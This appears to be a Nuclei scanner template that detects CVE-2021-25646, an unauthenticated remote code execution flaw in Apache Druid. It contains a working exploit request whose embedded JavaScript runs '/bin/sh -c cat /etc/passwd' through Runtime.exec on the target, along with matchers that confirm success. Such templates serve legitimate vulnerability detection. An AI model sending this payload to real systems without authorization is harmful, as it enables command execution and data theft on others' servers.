id: CVE-2021-25646 info: name: Apache Druid RCE author: pikpikcu severity: high description: | Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data. Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. reference: - https://paper.seebug.org/1476/ - https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E - http://www.openwall.com/lists/oss-security/2021/01/29/6 - https://lists.apache.org/thread.html/r64431c2b97209f566b5dff92415e7afba0ed3bfab4695ebaa8a62e5d@%3Cdev.druid.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-25646 cwe-id: CWE-732 tags: cve,cve2021,apache,rce,druid requests: - raw: - | POST /druid/indexer/v1/sampler HTTP/1.1 Host: {{Hostname}} Content-Type: application/json { "type":"index", "spec":{ "ioConfig":{ "type":"index", "firehose":{ "type":"local", "baseDir":"/etc", "filter":"passwd" } }, "dataSchema":{ "dataSource":"odgjxrrrePz", "parser":{ "parseSpec":{ "format":"javascript", "timestampSpec":{ }, "dimensionsSpec":{ }, "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}", "":{ "enabled":"true" } } } } }, "samplerConfig":{ "numRows":10 } } matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "application/json" part: header - type: word words: - "numRowsRead" - "numRowsIndexed" part: body condition: and - type: regex regex: - "root:.*:0:0:" part: body